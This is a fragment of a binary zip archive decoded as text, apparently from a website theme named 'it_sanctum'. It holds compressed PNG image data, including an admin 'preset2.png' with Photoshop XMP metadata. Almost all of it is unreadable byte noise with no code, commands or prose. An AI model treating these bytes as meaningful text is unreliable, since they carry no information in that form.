�:�R9�<��Ҏ׻K��#:���"�dZ�"4|�G��ܖ�*��s�X���c�\���i���[��(EE��(C+�~���:4��u��o�|�s� M<���9F�7���-|��8:��jv{1��#;�ө��}BZ��*I\�nF�}�O?@���Wm!���� e1�K!��.w��8��� �5��%�	UwYjzc���M�p�ff�&�;���~s/^��?�ih��Ȭ6s#�w>xV��e�W�|/�;�
���Յ��#u�o���=�v<����>����!&�ĥo_9[�s<�Q���4x�@܁��@&�m]�UvDΙ���/|���WT���cK������5�r9�B��~/\���
�Y�6�XLs��̣gr��"M,7��ckd�#;�ۥ�RY�1��̿�PW����o�2����@���W��aVȐ�L��;`a&����MkI%o��O����_�Ν���G�_��a�?���yc�6�$P5".�*���(<��`H�R����e�n&��#�鮟Lg6����N
�����ǎ
S��$�ĵ[���51��׻��MxQr�^J\�Z�q�X�u_j��	)��f+��[�d7��9��{K��B��Z��G{"�f��@���i����}\�ܛ�?�&�h�MnՂ9�;���_F;q��_�CY��8t�"R�Ԍ���Rȍ������'}���u�p�� �]�P�s�]I^�K��jD�{t�vm��{{�}<��B��'�w�Db����
�&�O6
7��e$ۜ����U7�"�ky�O�5j֒o�s�6D�*��@T�c���_�5q/
��<|2�s��2g�.:�����Hv�<��"��C�<Z@��,3��⎄�0�
�
�YaО�=�'��ð��3'V�V���q�D��?�vݦ����@�,$j�8eGzm?n��4&�:���Moۯ;�i��~���A܁�Au�o��{���.�v���!�ގ�\���>b�2��z���]:�#����� s�R��f+j)q��(��wV�۔-��G���C�:L��5����/��<�s�_��D����bG��J�R|Xc������s��gb�P��j��@��@���<2Qm�v��TUF)*ʿ�0���W+����{헸S#�>��9��,#K%���"��W0fp)��߆ʎLfs�=��	�����c�C7��XR���B$*�sy�y�������}ݿ�ݮ,|Bꎃ��]
N�6�RvMk�Z6������u.�Խ��|������Z��G�#+5���G/+̻����m�,v��گ�Yr�n�Ä�cSi�@�nr�����U�̷mv�`<9�u��3�5Q{��Z]��?�s�"��ou���
p����A��%T�yWn�
�I�p�G	��V݌��&����?�A&���aU+bqP�?����sW�N45��.s�9LY&�;%�߅U���Wv�� b�|�򠣿��,=�[*Cm�J,Q!���$�wC��z��/E!�,��F"�m]�:+e�z���agl�t���k�2�zу�oi����G�;`���0GYT�������{�у�*;ji
�(|����slRӰZ9N����}�B��HF�N�6�ġj�ѫT�����]�J�ʿ�0��_H��"���#-ƽ�޸�:f��[�]ʔ�{pc�K{-�
����*�Q>��Vm�z �U#K��~�8t}��}�8ul��Z�����oT��Ӈ����#������G�h=$MO�7g�PՎW@����d&oڛ}������y�ˍ��$"���K�yS��)�{A�'��lTs&����*�+���d��<; �@�фiU����uÑEOd2d�8,J!��v�`�}e�8���AI|��?a����H��)����ĵ۴a�#x����bXF�
dG�3�Q��DO^9L��� �F��@���|������ĵ[�^�Wj��x��b������~��T�u��eػ��1u>��=���F�|��j
{�y���<� �@u!�h*�D��3q'ە�b�\W��
�u02����3��[7��>T*���k�`�[U�ݠގ�5C��ˏ�r�nb���9UI-�ٚ��$��q�Dᓗ���K\�Mk���ڹԝ�x�:�-���e�J*<�9|�l��k�<����82���6h[��{Oʛ�����j*{�
IE� ��=LL)�FA�9�sn�K�,�
^�ur�_Q���Q��diZe/92��J&����Le���]�Lk~�p�=?*{�S�{��*���箪)�&6VIo)l���k1�ԅ��J�I��z��*-�-��m�G��P�s�J��5}Qp#���Cֺ�8L�l~�wM��B�Z٨������ ����/��
:����c��o��ږ�������t.3?��($"bҧ��V�jmۖW�W!�72�c>[���m3&MI��&$�ޢ
f��i/�{�?*��Y���Y�$.�������%k�t��q�5�A@��U���܋׋���0L�a��3,����ُ�u�׊�m!2�[�Ͻ� -y��J�	$������m���׫��Ehy��y��|<�q����UŒ�U����ͳEMEӓ{��"Ҥ4ib�$6Q��Lo]��-�u�Zr�_�{{��E��c�P]��Q�$�٢�:�v��-���8j^~^��c^��pFB�5��!s�$6��a��h5�\�(!iVd��2��Y9�B͈IQ�"/_��+Oϒ�g�zo�a�f�&V7��YzVy��X�_VX���ASѱ���?�x���;�Ѯ�ٔD�w�9Q�hLyu�ZhW�Jiv���r��1e���S(�Ht�j\�K��Qܗ��|��A�V"a��$�<z���8:��M��Ќ�9�ߛ�ak��E	��Cz��Wp5�n8��?�����8��%#��E�CQӂ����UK�~_�.�5�fV�P�^���� |7~��ޑ�d�[�U�q�
hQ����Ux��Yu��q��f!�h�f�i�{^+W�*��Y�XϏ֙�h66i5����nŖ8L��ci~���� ��~[V�:.�c�}�S�:M����#	\��?�vRȐG�u��ab�G%��\��E٥a��VZ|����k�P%�ܔ�iݹ���v����i�<��G)���e��>�5�e�z�J.'���Ii����[C�j۫Kޕ�Z'2���
a=I\�
,���_}�]���<�ʝ�#e�w����6%XX��̓h�D�␈��w���Jsj>�U��~!;K�"0����+b�|ݐ��Nuu�߶Zz��@�Z����k]>BmgH���\�+�>yQ�.&}����eۯ;�ّ@$�A�r*tO2��0e�fj(��A��Z!K���:o��1�Ht�ޕ}�_��ch_���!��Iv���:�7t�t��������^m��R��*IL)��ɿ�X����,U-��g�mAuw��:#+��dO��%s�$���,��yУ� ȯ�_��n�J�����ܤ8*��ح�9?��
�;�;�A�z˛',��ΐ�Sw���Hq��M��v�v9z�7��ٔ�]�۾F[�f�'�l'�I��ٔx�s�^Ҹ�ãp����H��V��h���m����-���@us��Pœ��ы�)s
���ztj�o}����CξBС�}=��>wp�
]�=\kNّ'�ߩ�%���9�L���Wk��F3˩�;c?C�y;g��y�<������"�ELdАJ2���랾�sW*���zuV����w�at����wGx�Q�'�?/V����5���M��ө���2��sL�K5Ue��f��<'�Ư�a�{K���y,w�FhyㄉpUCY(J�y8m�a#F�6��f��E}����}�]���E�	��z��Y���ѽ=�VRT'͂=�p��i��<6}���o�~�ʢ�aEa���{O5���E�y�1�6A���Bu�h�]���ز�|B��i�*WuA��nc_�[�����yILBȐ�-��Bw�B@����߱΂�<�w�ϻy���B����HǷ�w�V��p��g���O��6t#D�����.�*��#z>nv�Gk?~����ٹ�Ԍ�[%�	�o��^��ǚ�nߊݾ%}N���B�N׍�d5lv�P�k	��vC�_�ɶܶ//�����W���2��%�[jS҄����<|n�F`�\FN[���8}|�.?�*;jx=;��fۧ��,
S,y|��퀞�k� ��f���4m�6&��ء�EPiE�g!��&��3�%�ɲ�4�B��S)*R�4���yK�I�t�vX�MIXv�ע��oכ3eɸ�Q)�N�+LnU�(���Md��XR�ml@�A܁r�M��#&�'��K����8�y3ܗ��}�������m��j��.x"��n�R0r�`�`"�Z��GD�����.�h����f�'���FX�~�֜�V�ק�F���H5sS�s��#��&�J�R�	IFc��Pe}��O3���>�P�ʧ�:׋;M��>�ā��2<Vm�f�vR~�(|�҄�\7�FK�����q�=��Ɵ4�ק+3��N�+}<_��/���M�܅���;�
#��j��.���|�D�o�$.	��ő1�7�hA��Q��% ��،%�0�+J^������b�m!1��w��ָ�1��bC������A�v��W�K���Xi#1>�x|4��^�t��#�-�i�e�/��V��2��JU�P'5}�qI��X[�"�����6��P��Q!��^XT��3��qa�����2eW�4a�
��Ĭf���>�>^�]i�����J�W�#�/|�ƞ0"���gg���
���̣gBM�lb
rU�7X�@ÇĠW��k�����eAG��(
�L���<|�у,{:�f�2��<.��޶o7�w<�Y뱋W�J��<F�i`�ka۷;j4�~�+;��	ףV+��L�V*�
%�[��K HD�D��P�7�@�P�]�����с�:�#c4۬�N|qJ)
��\�-�zvԉ;����y$�^�y���p�^up:��y�Z�t�<�qC����ަjbG�f;�Bx���"�@Y(R��a�*%~p�F�I*��dY�a��@@̀<Whb�v�f�?.�%�6F��&Q	���(����ͣ4$�[�&��ׅI�=5z޷z�6�׫��f3��;�^�'������U���떋Z�,t����3{���Ѷ_w�о��S�S����B �@��ڮ�[@�&�cv��(���J^��Ȗ�8
辞�_��;ٖk=�p`c��m���y�;�۶�tnS�J�O^��k��dJ�c��F�`�@�m���`�)�$����G��(f�ram9��gNt�������VTR�c���ڞ���a���ˮ�+��0���P����y�3c&��~��%R]�%	I����tZ�=?�zu��cH�aGu�`���l�%�$K�����NFE�e�X)S��c��~�j�\x���ݜ����k]1�C����ޓ�����M ��j@܁
9M�¯>�r��*��\�BN�VMO�������]I|�<W�*��%�W�j5�h�&��b�8lԫ@M|{>�Q����v>�
�+K��3)��ɳr��A���GG�;�;`��}<����t
K����Q�Z|7��;��]�<���>�7��NH�mݡ���3A5]�E�B(:�8*Nώ�t�nP/��Q����+p���	#�6���D}x��
��@I?��L�Zީ��u�YB�d>	�C-����	n��MI�W������k$��v[��ck�X �I��թ;��~=�Y�+a5��uX�*�"A�E��3�a,�Z����\gw�\>z&Z�m3<; �@= y�nd��f\*�)�M|t_�~�M�R��jSب���M|�wb�]j��j�=	:�82�����c�=����2CO%��_~��/T�P�٭��myv�{K�lJ޸�3sX-�(�"���/���Xjw��ͽt��m��q�6Y������)o&͕��@���o}e��V8�������im9}!����C�Pݜ������7
�B�R��0��&�r��=�������.��k��B��o"�4�F
:�S��;���߮����'P@��r��ZGD'����{���H�nn�v�1�M�{��ǣ}�-sTRY�������f
w�d�'a��F^	Ҥ�B�A�m��xIJO�=���5[�^��^��ɜ�1*��tO�HlV�{�k�Z���4.2�0�L�A"�q?��U��FӞoܫ�6K���z,l�L��8�v����iD�]��hy�d���z��,F��W�w�� �;PS�}��Q�o����������Ѡ�Vh��$��5���˨��=Ke��x��dOuvl�WA%WH��C��4r �/`
��Q�����ӹM։�	+7*�4j�q��j���|�x����"7�0������IJQ�"'�zj�@&���߼�`�0�L6l�`�`E��A�܁=fҒ�K�,E
U�;��)����h��4l�Ƚx��Ȩ/
��{���jÙ�Zx=;r�u �HTˍU��=B�Q��2-�"�0��	���]%k?��u�e��w�âVl�:~��՛���2~�3��5�\Nd0�9ԏ>/��s�R����<3[%��z�#�?n�YGϰ[7�{�����^3;��R�*�Nӳ��Q����|+
��R�R��rE�7"u�����s�8�;L���_��_�-��y�3���.NUK,gm���$.���x�:ڂ-A
5k	��2�}MFo�*t�������b8N���8"�^w(mΦ�����UkȮDv�Tg�zZ!o&~b4��o���I���*z�:|�dž�q�u�c;Z�?�8:n9���K���*�l`qϽp
}$"�k�"��u�d����z}k��(�
���x���T���\RY��'i��>~i�O���%k��Q�5m����;�=�a�h�
��;PK���ݦ�<+'d�E^��;�D��T���eSf��,+��<#K��Eb1�=:�<\e)��D����*���Fd1l�6�g��~���Wӕ��n[��q���Y��6G)[�t�"qj��W�kj�%q�a#g*E�8[�m]�s�Rҏ���tǩc�]�3��������&�$f���T�&�Q훝;��F��p�����U<����u_�vN�i'V�Z�<I�r��V�au���w�r���Ti�O�����fNbUŨ�9sI]p�1n�����L�!5�U���D"���~t-d���d
�W&����[!�zj��TP!��Ͱ_K��eal~^Ze��W�mʖ��;�N���΅�Z�ٳ�����,Z���H�ʮw�H%kF2���6���(Z@m�m����Np[8�n@�Z�h_�E�� 9@w���('�1-�b���,
�f�a����?{wEp��-���-x�E� �1�""�/^��Q�Q�^Q�R�h��hP����1���
P�*Զ ���P�:�".��������f�N'�~���7��V���M�w�I7US�w|1H|귗��>k�ץ���=���ߚcwgX�y���7Ư�<湇��Z�c��܍�'o��-�W�oT��ω[����NW�0�����<���-k�%��U�ݟ�o�P�/��Kf���u��������\��kY��/4ץ��G��8�{�Z��]�7�?Me+��7��W�]yS�
E�:ZNq�+&:^.�ѻXeU�Qp��9͵����w9��_v�>nj0��vx���[vsӻ���Ҿ����Jk�}�{��akum��^��k\�l�W�M������.�3?�>�ƧevV���Ϟ���wd���_{*-��B'��Rx@v珪**����`3vlI�߻��'���sƐۯO�)Y�
�-��om��\`���5,\�GV+w�@�QG��G��*z��ٱ�5u��հw�j���뱴��mm9;&����/���H��-�7��!����M�Ĭ��ݖ�Z��Ç�����������ɁW��9A�N��Hn΢�W�V�N���=��
k�ܰa���.<'%ށ�9cP~(�>4�^E͵̳Gd����SR]=T��Z����F��oN�񛾎�#8���1�rJQ���NO�#�>'o��A��9���^��Y��ή���'�E���Mzd��w.��%�^�p���S$���2�?��Z]<+M[���{�?��ҩ~m-��7O>(~��Z+;��,��״66���[�rIt��^��{��aOL��ݏ����������ˮ�������5-]�[xjֶ���53�tq1w��	E��	�Su6 V���g��I�+�Uk6���T:?8숟O�X���L|�����<���Ƚ/�G��)Sws%}�������v4��1(D�s9����Rq�3AI�?f՝Sֿ�����ܗ���y�F�:i�W6|�U�Gs��q���.L�h\���G��eD�Y��~�jƠ� �~׺������	%E��4���JsN9|�
�TO�q������w�Q��3�V��V��G��3�)\�����Yq�A�yLz�[�f��k�.�g��Mʎ����p��ۮ�z�]�N/z;ni����^��z11ѳ5.^�}�2 ;���Xs���L�c��d�8v�%��0r�WiZ�������0��;$���| �˴�� ��;����;��� ��;������ ��;� ��;��� ���� ��;����;��� ��;�� ��;��� ���� ��;� ��;��� ��;�� ��;����;��� ��;� ��;��� ���� ��;����;��� ��;��Л�#�������IEND�B`�PK!�T�DCcCc#it_sanctum/admin/images/preset2.pngnu&1i��PNG


IHDR�����tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:DC7CA137858B11E6A95BEC6DA4517AEA" xmpMM:DocumentID="xmp.did:DC7CA138858B11E6A95BEC6DA4517AEA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DC7CA135858B11E6A95BEC6DA4517AEA" stRef:documentID="xmp.did:DC7CA136858B11E6A95BEC6DA4517AEA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�X_�IDATx��\S��IB�������"8q�Zk[����V��Z������֪�m]u�:po�! C��{��������B��W>~޻yy���=��sϡ��O	XP�
@�w�q@�@�w�q@�@�w�q@�ww�q@�ww�q@�w��q@�w��q@�w�qq@�w�qq@�w�q@�@�w�q@�@�w�q@�ww�q@�ww�q@�w��q@�w��q@�w�qq@܁~
�BU�ҡ`�U�D$����Xڎ�0 �a@�Q��Y�2P7����?G�̡�b���O�|3�e�J�Ϗ�
�܁�@y]f�/�Yi�� �@ �(�F�E���Y��A-
���oE]Yvy:Tt���Ǥ�&!�P9�!0,����>��7So�
q\P�(�o�^�*���1�6s������>�ԝ2�/.$���|�j��k#�]鷖J�{$~���<Ŵ��p��(mU��oxe�[�.fږ!�w���ED_��V߱��vmȩȈ�	������`�
�'S�Y>|���yX�=)�5��Ɵ��}�m���+�`k�N
��"}�Le�L�E���uM�P��;�.&ֺv:�l�JLn�,_I/M���R�ʎ`���f�4�yjx�&�m`0�2�B���0�c1C�)ߝ#3�:��t�7n���ƨu�^9{�3k>��G��f��������Vl<�Z �bX�!�K��i�a���XTS���;�\�L��x����\�D�9���/I(������� ��u8Lu����������5G#W'#w�O��w!���Ռ�jDV��W6I��O��-^���e<h�%����?(ܦ�.|i���[��6�⚂��|��z{��r�0���RwHVYiK�P�6�#?�r.�g��Mڪ������I������;��E
���G����=�՝s���숬��h��Q��jK���,��p�xyBA,�����1k����[��|���>[<�u�A�܁�V���}xk��kHs*26�[��o��ב�"M/��}?� Z�������7�U֗��|�Gd���SvK�\ǖ?��Eg�G�v'�2�.��3ZR���~
kEk.smk7�𬇲q�u�k#��VեQ��s՘�*;��M͍�_ߒP�ޖ�3�7�]=�k9_�K*��;K��y����j��( ��Ȅ��������D�k!�K��*�*��So5��t���rX�H٩�[�Egw�y;���ċ�S�Wԕ>L��q/�$�X�9�j)lC�u;)�,w�_b�c�c9�!!�����ޮƟ�}c�2s�ȵS\�t�*��8ҝ=�����ۉ��So��������sj,
e�ruCU/��Oآ�����C����F��&��Ə��t7#k)�x���+F�=�q:��8�[�*�5���Yi��wM�WR[(q*�*	9Lu�N��l�ߗ���P���3�Rן^���~u���sO�����_��FM��`���i��W��^�f����a���P�Q��[;�*;&7"�<-8�������Iۻ�숻�׈�7. q��\KE��;�t���
� �`dԐ����<�uQ�-ul�����'^b�g���Z=���~��p_����27�(��*�B����<�a����'�����Jр����
�8��֪̗F�������ӿg��5	:6fZ��?C
���l�7������=��s�_W5�F��]�����W�牅*�G?�~�𬇱��e)�
�⛱*�);�\�G\�1|,F�'��,
]���
��
�p7 ���BA:N �}����GV��W��&9b�ڱ���æ�#�C�'_W�~��iT�@(��ƀ�6�0�	�"����{�Z׮�����+��
ROmU�GH�&n�T����0�\M�2J��*�Z���\�lت��t�B��h��
w���^���P(�� �|A�Ǥ�(JJK���~�fcO7S�i��[�.��/�-��<SGU�H��?I�l�a�c�W��f8�eN]S-����w���n$�MH��Ł���?wji���"F}�~q�Z*:O��,)~zau�:KS��i�7�[�^�B�����\�{��찝W?Cע��9���2���3Y!�6T
]�:[C�c��f(R�}b� �&�4�∻��Ѷ�G��o��]zˀ�9��N�Jz��x��+XnimQQM���Nj|V�oh�r�=�-|����;imLn��K�]
��]�@��8��`���kJ����/�#V֗�'�C1l��Ic��x12�]M�V�x��{c�i>�y6Zn  ��l�"�N�� ^��;0H1׶�vn��ޡ�|���D�ܓcϭ^���=���g=���6�A$�,���>Ig��L��;_K�t��kr�h+Q��_'sv�G���t�-Od�r�jT*m��T�\(�'�m<��۹�a"�Ӯ�[r?�:��V���*S�N��z�ʓ2���Nx��@��cE�?
U(�,Vw`�b�c�͜�$Fq���L}2J��
D�Ԓ�u������l�JF�קXj�\�
��˯�QjOk��4�a��&nk�7Ff���loM����@�-�
	(��X�f�-�̲Td{�F��t�����O���L��ƪǙ��{m�uI��1��Lq�}sky]�R�G
�x���EWa��"`�.6:7�4��=8L���v`�:⤕&3�9��t_D�1�Y�Fnw��7�i�F�.ˈ0�r�u@�:^s��v�&rBA�W��eWd��e(��`o�_��S�!eol���v3ʲ�,�BȞ�
�^�J�}0/T;����2�M��Vc�������(a$����:���#���{�]��Wb�=L���䲼�lb��	[�M}$�g�����G�M�i'-�������)���vF	U��R`�}��֎�`Է�yO��1�':�L*�'��$]>
ܚU��˝o�K���_�t؛�Ԅϩ�_��}ZY_.	�V������h�hOu��o;�H��E�Y l.�+��+K.J@=������<��).sU���Y߳�*�B��5��ɀ���g�O͵�����,%�?�3�&Aqg��_������OE�/�D#��>f|{�֣���2�'V�k
�p��?9�����T�q'wT�}�Ϗ2�j�ҵk?U��ѭ�f��]�nS
*ĶDB/�N�i��
�MT����p�������4�y�)?�}��,-�~��6��?(��}��X�ʸ%�5��1[�7��\�$����sX�}�&�#����Qе�9�3�=̆)S�3�R+���
�QCƣm��j�:uPa(l����iwʹ%J�c�C-G:{8�hc��5
U��9]II	�qD �n����ƪ��̪��~Ccs��)�:[S�WH9B+��%n�e�����S�Y�i/r��]��{'��Vf�9�`��g�^��a�����4�qn7SL��抺�Ќ{��#n�C�P觅"۟Eg�Z��ſ�xA	24���2��O����f �o��l�Hx5�_$���>+��d�8q5����:��̔h�6����8X�lb�8���*Z�E	|����{��x�N�n�
9c^��1���PÄBy��$^��q0tj9*,��7j��t��Tf���[�X�;8�x��Oϰ謁1�q:��L��=���fCGڌ-�Nt�)e��G��م"!_�2���1�g[=ɉ��
����0Ҕ���~"��H�ғ��ī08�zv����Uu�m'U�T����1��{���mA�g=D��H�Dz����WG��"74
��#duJ�.���$��$�8su��=j'Po �4�XXZ[����Z*:�]��5qSK��:�SQ�aV��:�z���U��@u�&:��™��R�	���O�Zc���#� �d��]V;�⚂��4baba����}��r$�r��#���;�4�-�#MD��-񣊺����ʸ�&Z�,��R۶��fZ�!�w9L5G#�^8bp�-,,�6An&�}�n6�@ݸ�_n��D/)�d���2��� #���0�m��LKT�+ɫ]���f��n�� �I�2�R�ĝC�e��L��͵�����2�eS�գ�:~��C`� �U&g��k��b�e~�Y�$�2���BʄI$�M͍IEm�c#�/��a=Z�W� ����9���*
bn>�$R��-�}�u풋⢲�m'��QP��rg'(;�X��,�^]�G�b�i6�ky7w�\��~�T�V�T�P�cѮ�{�
�wd�#I�0E�W4U�}���9LUcj�͈�|hW���z�6��\M�#�B�
�9L�g�OQ�%�s�j>>�Fs������Z�ٔo]�=�$_������LF����i��$-�!�R�:.�	����0�,U�I���8{���Vd�?��+��|�J��:+���f���/tߑ�}bN��X,���/�+�)��qW8���T��:�qfp��'�Mr���ad/'ŷ��t}G2��::�����ؼ)oe�Z���:LA;O,|Jt�o�ף�i�����+�����E=�Q��n#�B�G��qWD�M�H�{T�q�j�I"#]��h�[�X����-��C��$$*㖤�&#�V��Q�1�yf#�!���<"+$�0��t(2��Wv4r}�z����`k��o���s�I;�}Ёd�4���\���4<b�;�݊�qO��I��J�L�}� �&���*5�fJ?:C��m1��vBmc51$zqM��+�����
[�t#�*5c����͗�>S����K��tCu�ڦ���ADim�P$�l�*����?C��|�5��?�
��E��Ћ��S3��mwZ���������Š�2d�#�&G��1�f���eRQ��'h
M�'	\M���OG��J�9�H��wԐq���������Y�����;�f����	$� ��.O��w��+ɱ!y-��i�˒c�*�x�/wv��:*eW^�ÿ���Eo�4/�Vre�:���۷�[[)?yt�����<�}"�|�$8��\v�g3�T`HQ�4	��V�rtD�<�龰_,�\K����7T�W� ;Z��A�Gd��#���*RB�r�[�~�v��1���*$����5f��i��SHN8���w6�P�:G��8����1(Y@�k�m�Pf���Z��g%��#�$�����zYܞ��:�E�Hp)�4�i�������*Sm���G��x�Ș����jo����5G�MJ,|ZA[�k�^O��j�%�?8�q�q]S-jf�vE�\hP��f�ļH��a:�WNi�̵�P�o;�
ڪ:ϻ��� ����	S��f�]T�/�QAu�\�e�ݡ
CU<�@�pJ~�ϥJ�1&G�M��	�n��>J-y��DfG�7�iFl^DYk�	�H�����S�E�w��"uK*�+z������5��lt���.�s��J��,/��%�u@܁������3f����ôۤ��\�y�
��>�].���"IINE�ߐ��_�2c����p�V�������_�n�ɟW��vB,��|�B��L�R�sc?9*�~ܛ����n��@w�:K�R����G�����^�ux
��(��H�t9��͍�8��Fn��Bb�a�٨� EmD�VfY�1ղ���;Lm���N��e�
�zO�aR.�"{��D�~�L�JJfW���o���9��n9,�A��j�Tԕ�Br �@��[2�y�Rk������\=̆Ms���}ה���I�#��R���/ܷ��9L)���~�1�(^z|1���HwS���pb����5
UR�(Ӕ�;NC�Md�	xQ9���ɩ��=�Te��)���V獰���B�2��ìFIq?�U&'D,|�����$ka3�h槕&I��NDO�`��ԧ�Q���SK�%'���$˹�it�jTv~V�&^�j��mgG儡�(&7b���bf��>F��α�P�;0��.O��C��]�ڦ��IW��c�"':�$�@f>�7Df�b�O�4�ZCڟ���:
�[�Q��U秕$��rz���w���Q6#�Bf{,���b�y��Ϩ���u�╨���_����c1h�#�ye�[
��l��'���E���E���SdV�zvY�G����ۚ��4v7��=�"����g<Id��?2�Qc��T�Fe?�0E�1%d��x�M��aO�3pr0t�/���աk�0����
�$'��WbF��t��Z*:yU��e��
$�o���g3�Eg���!�=l�R#/v
dV�Rv�V��[�!
���͋���𬇓�g)w�����D�<,��Q)}����I� ����Yp���j|`g��2��K��P���ôۭ��D?��*�쓿��{�X�F}�a�V���@��A�9�:�ñ��-t��[�Gn)疈=w���)��g>�8M��!j�궺H>��/o��g����������u=�^R�Py7�j:�n�m��d˼�)������
UX�4�40���lTNX�+�,����Q*�-ӿ!b�2>͕�"r&�/y��0��ld�X��_�,�-�2���ط�De�T��r,k]��g�#�T�Wl��q�_t1�$�&HK�J�1{:l�F�ŁwW��
�٣$Ƣ:$ƕ�r��ڱ����=�|��W�Ŧ�X�ڎ��4�~��>;$� G�f�c��H�S�^v�J��3�/R(��֣x�����TeC ��:�(��Jjb�����o�&:�$�B�
jKj�2�R3�R�z.#�w�0TѥU��0���ꗣ�>��SLר�.H�f�/t��f�-/eWj	���\������2�EJJ|��S�1��O[UW��H��4FTNh�]��	�t9��Z��𒴒$�A�Z���S<o��X���k�N� j����Ov��zu�2�D0�2@��Rt��N��8���E�]���p��m�'�����i?�pvȨ!�׎��X�����Bi�Zm}r�'^᠓�x�W�|
�-F|3�7xR@܁~Fs��rߘ5��^���wس�n���bG�F)�ˢ�;u�	��FX��WB���Hٞ7�z�N��f�ȵ𰀸���������"!q���G�����}���V����{v�6�j��>^Y_޾����v��Ffy,~w�&x^@܁�������n�=
>�㦘������u�!m�Xt��SwK��Oa*�8L5B'�~��'�N3f�/����O�{r�Ϳ���!=
)�Wzi����U�,�Y�*��?�Z�$��чZ���x��'Cŝ/h��d���w���kn:���^���k�o�v꾻ߊ��\2��C_Wj
�%_��ޯ�˩%Ϥl��Q7����,��P �@{tUt�4F/H��ĉEH�g�/k?YF�Gq3�f��̚���������/+��z�
�zq��.�^��s7�!%��.O�+l�������n���z���γ�e<7�8�;l�*�!��qz��o�Z�k��4i�����IEq�s�).s�儂�� ���z[��	7	��ɭw��q4r�b�w�yDu���kݎ�����^8���1��<�Wa;aj��J��	%NO�X��J<(C�;�4�������&�}�6�iF^e���Sx	�������Y�gO�FU����Vf�墚���F�29p��������
C��أ��;��x���=�	�}�|��ZRT�̲����;
�-��B�D|���
|�Ac��=��a�5qXt�ϥ�jFP{ �@�"k�O�2�F[�k	���<��&��i
�N"�*_�S3ćq���r������l�%T*h�;�è+�B]��G�"�?$e�\
_FA���&���'�D%�:^��1�'��sFQu>��;г�N�cY��w0t%-,�~��N��G- 	�+s�-�0D
;�ѐ���%bs#�d�L��w]���*�G�v��K�A,nLE]1����
�0Dʹ�P	 �X�k��:���-��҇
=�����x���mG�)�D�] T�;�����L�)��Զ�̔�~~^�����JE�����f1qo�|<HLv�m�a
��((�
㪜]���Ge)'��pum|؉�C0*�_n���M�� ��u@��C(	�EzX����CqNG=��o9����7���%:G�rj
��0�n"�Vq���
gW]O�з����DL�*�c�<H�)�#�f-	Ų?�!�@{�3f�q����_�ϊ�	�"��'>�-Ώ7�
N�%�#J¨�9殧f�Q�r>�8�*$T��(4:�z�ɽ�쾹5_����r��oPAs�W3�}c�Ѱ����_�S*�P\Fَ�����B�R�ۑI�y���7�{��8�2"
�j�ˈ_;1jXU}֢t�$6PkG����
��؇GW�)+S�C�v���#>���k#�%�s�j6�[�m����ʸ%h'�Fې�H���{aMK[BQ��Od�P(��֣�@܁>�X�L��i����4F�l�-0�lla�ǒ�����4Vo8�Jb�/Y�k��K���X�P�Ob�����ڷ(���'�1	Ls����
Z*:�-=�}��R�I(���@]�
@�)i�S_&	�ѳ�5�w=���tuޖ�]��+&���^_����t_��g���P=D�%��f�9�@܁>��ǭ�/w5�Z?a��������g��-�׆����5�?��U����֮�{Y�������rG����Vm��G�2I��@%��}���_*��:��s�oRf�#��أ��>|�P*B�ȶ<��);�������{{Gg�UPM��!y
Uֿ|I	�:d��T�{��%
b��G#��ҏ�V�e*w�'2�<]b>#�($H�|_:�ͷF���M��W�~��:6O��^R[�/[�ڶ�+%QU}�����Ǚ��2s�*f{,���	�PUtNE�0q&d�>����+˩ȴ�|�ۿ��=��F�2��;_�n���γ��Qw��W�V��>^TS�q�vYT�-&�R�$qO-~��TˢM�#l�ˏ��z�U�^\SPU_�L8O��%�t���ֹ�x}}K�ⶃ��"Q�aU/F���s2rooK�w���g�/�D];=5�Yܥ��x��m�I���jh�]d��r �,��*�͈^U6�@Q�h���enS�!�V��`�Aq�Pg�THB�W��Ņ��=�k���n���,w��0�0�%����9�Ff���I���!�0cM�F~������q�o�a�ү�y9L���Q�M�3�x��j�y��0�X��[�E�u�1@
�������G��Kԏμ�Lu�w���M�/g	��G����;8o3U�m3��sK.ƞ�{
�;w��5d<)Ɠ��H� ��̑1Gǚ��PW�|�	�5A��/_Y_Q�X�*f�	J�b��j�6f{nE�/����e��s
Wvt�	���M}Ps�j׋*�ʓ��?>�
��~��A+��%��?�c1�;�;г ��r�ngcE>IҨw����lňw��Mʩ�$:؄��=�g����7&�,}q�6�b��VW���?C�a%V���2I>���������[�)�&9�ň��]�/�Yqz��#�*��+I���T�K��γxuvΤ-œ��:4D��5���U�&��8�&��������3��X�?��~/�:<zx����*[��0�e�⟪��^YW^$��SvhT�ޯ��z��I9��ZÖWk_��1j��U������N�
l����{�
λ������Y��ݽ̇��S�`kѨm�"%�ܳD557��;iq�{��X����N n���wN,Y��<K����ۣ7`ˑ١e)=ZiRo>�Ӡ@��j����������T�:[&����R��~��<.���q����5?3��,���yR���Iγ�\��m�?��Xc�#��p�Ky%0�C���[w@��tg�h/��nD*��/��!$
��k3��f�]�>ǖm�)Jm����� �6p��-��5�'�V�W\1^���9v��Kk�:L�����r��r����o./��$�۾tm�S_,��B}cԺ�$�
�Ա�4�Ŗ�E�C퍍��,
{����w�g���b�sX�m%b��	O@�(�Lݶ�|I�	p��2#�;c6���΄��,��
�m��1/�>�zt�cx�@܁G l.�����-��B��Y�#3P3"��ܦ��:�cAg���rqݾ�;���ux =�����	b磏�d��IΣ�o�����o�'
P)T�C�� ����rK�\��VpK�x�$�$Wt^3O �ٱ���i^ԭgA���<�x���y-Ǘw]���*M��)�T���#v��5�V��@w���_�H��<�Će��$�6���M�*�%O7������h��j�_�Ϋ��D��C���4�m(D8F�B�P:@7��
